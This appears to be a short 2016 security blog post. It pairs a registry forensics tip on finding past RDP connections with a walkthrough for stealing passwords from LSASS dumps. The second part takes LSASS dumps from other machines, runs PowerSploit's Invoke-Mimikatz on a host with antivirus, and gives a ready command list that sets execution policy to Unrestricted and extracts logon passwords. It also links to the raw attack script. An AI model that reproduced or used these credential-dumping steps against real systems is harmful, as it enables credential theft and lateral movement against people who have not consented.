Saturday, 20 August 2016

RDP Access Timestamp - Registry Forensics


How do we know if System "A" connected to other systems using Remote Desktop in past?

We can retrieve IP addresses with which RDP connections were established in past along with last time stamp.


You can find all machines where RDP was done under below key :

"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

You can see all IP addresses along with DOMAIN/USERNAME used to connect to system via RDP

If you want to retrieve date and timestamp of last modification of these registry keys - (Which in turn indicates when RDP connection was established with system) then,

Export registry key as a ".txt" file and you will be able to see "Last Write Time" which is not the case if you export the key as ".reg" - That's the trick!

















Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz


Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.

However, wanted to crack passwords for other systems!!!

Simply get LSASS dump from other machines - Not a malicious activity!
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.

Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.


Commands Quick Reference :

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module.\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'   





















Good references :
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780